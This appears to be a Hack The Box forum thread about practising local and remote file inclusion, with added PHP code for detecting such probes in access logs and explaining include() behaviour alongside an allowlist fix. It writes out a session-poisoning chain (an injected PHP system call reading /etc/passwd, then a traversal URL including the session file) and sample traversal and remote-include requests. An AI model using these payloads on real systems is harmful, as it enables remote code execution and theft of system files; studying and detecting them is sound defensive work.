LFI / RFI boxes

Hey there,

Can anyone list some boxes that are good for finding / exploiting LFI and RFI?

Being able to recognize these in web apps is my weak point.

Also, any pointers on how to notice when an LFI vulnerability could be present?

Cheers

I am currently writing a program that can do that, and I would have no problem explaining a little bit of what I have learned about what to look for, how to detect it and what basic tests my code will do. I am also putting a short timeline on this code: I should have it ready in a week or so for people to try out, so if you want to chat just hit me up. I am up late working on these and all my friends are sleeping :wink:

When you have ?page= or ?language=,
you could also use Kadimus,

but don't trust Kadimus too much.

1 Like
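The hint above is about spotting candidate parameters. The following is an added example for this thread, not code from Kadimus or any other tool mentioned here, showing the same idea from the log side: scan access-log lines for file-style parameters (names such as page, language, lang are an assumed list) whose values carry traversal sequences, absolute paths, stream wrappers or remote URLs. The log lines and addresses are constructed.

```php
<?php
declare(strict_types=1);

// Added example for this thread, not code from any tool mentioned in it.
// Parameter names, log lines and addresses below are constructed.

// Query parameters whose value names a file are the ones worth watching.
const FILE_PARAMS = ['page', 'language', 'lang', 'file', 'include', 'template'];

// Classify one parameter value; null means nothing suspicious was found.
function classifyValue(string $value): ?string
{
    // Decode twice so %252e%252e%252f (double-encoded ../) is caught as well.
    $v = rawurldecode(rawurldecode($value));
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $v, $m)) {
        $scheme = strtolower(rtrim($m[0], ':/'));
        // A remote scheme is an RFI probe; any other scheme is a stream wrapper.
        return in_array($scheme, ['http', 'https', 'ftp'], true) ? 'remote_url' : 'stream_wrapper';
    }
    if (preg_match('#\.\.[/\\\\]#', $v)) {
        return 'traversal';
    }
    if ($v !== '' && $v[0] === '/') {
        return 'absolute_path';
    }
    return null;
}

// Parse a combined-format access-log line into client, request target and status.
function parseAccessLine(string $line): ?array
{
    if (!preg_match('#^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})#', $line, $m)) {
        return null;
    }
    return ['client' => $m[1], 'target' => $m[2], 'status' => (int)$m[3]];
}

// Return one finding per suspicious file-style parameter in a line.
function scanAccessLine(string $line): array
{
    $req = parseAccessLine($line);
    if ($req === null) {
        return [];
    }
    $query = parse_url($req['target'], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    parse_str($query, $params);   // one URL-decoding pass happens here
    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value) || !in_array(strtolower((string)$name), FILE_PARAMS, true)) {
            continue;
        }
        $kind = classifyValue($value);
        if ($kind !== null) {
            $findings[] = [
                'client' => $req['client'],
                'param'  => (string)$name,
                'kind'   => $kind,
                'value'  => $value,
                'status' => $req['status'],
            ];
        }
    }
    return $findings;
}

// Group the kinds of probe seen per client address.
function summarize(array $lines): array
{
    $byClient = [];
    foreach ($lines as $line) {
        foreach (scanAccessLine($line) as $f) {
            $byClient[$f['client']][] = $f['kind'] . ' (' . $f['status'] . ')';
        }
    }
    return $byClient;
}

// Constructed log lines: one benign request, then the kinds of probe the thread describes.
$sampleLog = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=5&tool=bag&lang=en_us.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=5&tool=bag&lang=/../../../../../../../../../var/lib/php5/sess_sessioninfo HTTP/1.1" 200 1839',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 77',
    '198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210',
];

if (PHP_SAPI === 'cli') {
    foreach (summarize($sampleLog) as $client => $kinds) {
        echo $client, ': ', implode(', ', $kinds), PHP_EOL;
    }
}
```

Run it with `php scan.php`. The status code is carried along on purpose: a traversal value answered with 200 and a plausible body size is the line that deserves attention, while the same value answered with 404 is a probe that missed. Matching on the parameter name rather than on every value keeps the noise down, but the name list is a guess and should be extended from the application's own routing.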

Thanks wabafet, can't wait to try it out.
peek, thanks for the 2 points. Also, trying Kadimus now. After playing more with the PWK coursework example I have a better grasp.

Thanks again

Just saw this thread and, in case anyone finds it useful, a few months ago I created a small tool to make the process of finding and exploiting file inclusion and directory traversal vulnerabilities a bit easier. It's still under development and you can find it here:

1 Like

Thanks, I will test it.

Thanks game0ver, I will give this a spin!
On a side note, I just received the email: I passed my OSCP exam today!

Cheers and thanks to everyone on HTB!

Congrats @mxz3n!
Thanks guys for trying out my tool. It's still under development, so feedback is much appreciated!

LFI: Lacasadepapel
RFI: Help

I will admit that is pretty cool, game0ver.

Ok, I have a question here.
Say we know that via some method we can inject code into the session variable (I have learned that by default PHP5 does this):

var/lib/php5/sess_infoforsession → the actual session file that is stored server side

My question here is, say I do this:

<?php system("cat /etc/passwd");?>

http://url.com/index.php?id=5&tool=bag&lang=en_us.php

That ends up in the session file. Then, once I verify the LFI, I want to do this:

http://url.com/index.php?id=5&tool=bag&lang=/../../../../../../../../../var/lib/php5/sess_sessioninfo

I will include the session file that is stored on the server, and because it is valid PHP it will execute and give me back the info I need from the /etc/passwd file.

But what I want to know is how this happens. Is it because the lang parameter is doing an include, and when it finds the PHP file we included, only the actual PHP code in the file executes, allowing us to get RCE?

Otherwise, how does all the other stuff in the session file not break it?

From my limited knowledge it seems to me that if we have a valid include and the programmer leaves an LFI up for grabs but we can't seem to get RCE, we can resort, if it is PHP5, to seeing if we can store the info inside of the session file server side, like with Apache log injection?
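The question above is really about what include() does with a file that is mostly not PHP, and about the include pattern that lets a request name the file. The following is an added example written for this thread, not code from the box or from any tool mentioned in it. The first function writes a constructed file that imitates serialized session text around a PHP tag and includes it, so you can see that the surrounding text is emitted verbatim and only the tagged block runs. The second part shows the unsafe include shape next to an allowlisted version; the language file names under LANGUAGE_FILES are assumed.

```php
<?php
declare(strict_types=1);

// Added example for this thread, not code from the box or from any tool mentioned.
// It shows why the rest of the session file does not "break" the include, and
// shows the include shape that makes the lang= URL work next to a safe version.

// 1. include() hands the whole file to the PHP parser. Text outside <?php ... ?>
//    is emitted as-is; only the tagged block is compiled and run. The constructed
//    content below imitates serialized session data around an injected tag.
function includeMixedFile(): string
{
    $mixed = 'name|s:3:"bag";<?php echo "TAG-RAN"; ?>count|i:1;';
    $path = tempnam(sys_get_temp_dir(), 'inc_demo_');
    file_put_contents($path, $mixed);

    ob_start();
    include $path;               // serialized text is echoed, the tag is executed
    $output = ob_get_clean();
    unlink($path);
    return $output;
}

// 2a. The shape behind the URL in the post: the request names the file to parse,
//     so any file the web server can read becomes PHP source, session files included.
function loadLanguageUnsafe(array $query): void
{
    include $query['lang'];
}

// 2b. The request only picks a key; the server owns every path. No request data
//     reaches the filesystem, so traversal sequences and wrappers have no effect.
//     The file names here are assumed for the example.
const LANGUAGE_FILES = [
    'en_us' => __DIR__ . '/lang/en_us.php',
    'de_de' => __DIR__ . '/lang/de_de.php',
];

function resolveLanguageFile(string $requested): ?string
{
    // Exact match only: no normalising, no "strip the ../" repair attempts.
    return LANGUAGE_FILES[$requested] ?? null;
}

function loadLanguageSafe(array $query): void
{
    $file = resolveLanguageFile((string)($query['lang'] ?? 'en_us'));
    if ($file === null) {
        http_response_code(400);
        echo 'unsupported language';
        return;
    }
    include $file;
}

if (PHP_SAPI === 'cli') {
    echo includeMixedFile(), PHP_EOL;
}
```

Running `php include_demo.php` prints the serialized text unchanged on both sides of the executed block, which is exactly why the "other stuff" in a session file is harmless to the parser: it is treated as inline HTML and written to the response. The fix is not filtering the value but removing the request's ability to choose a path at all, as in loadLanguageSafe. For the RFI half of the thread, PHP's allow_url_include directive (Off by default) is what stops include from fetching a URL, and open_basedir limits which directories any file function may touch.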

Awesome, thank you.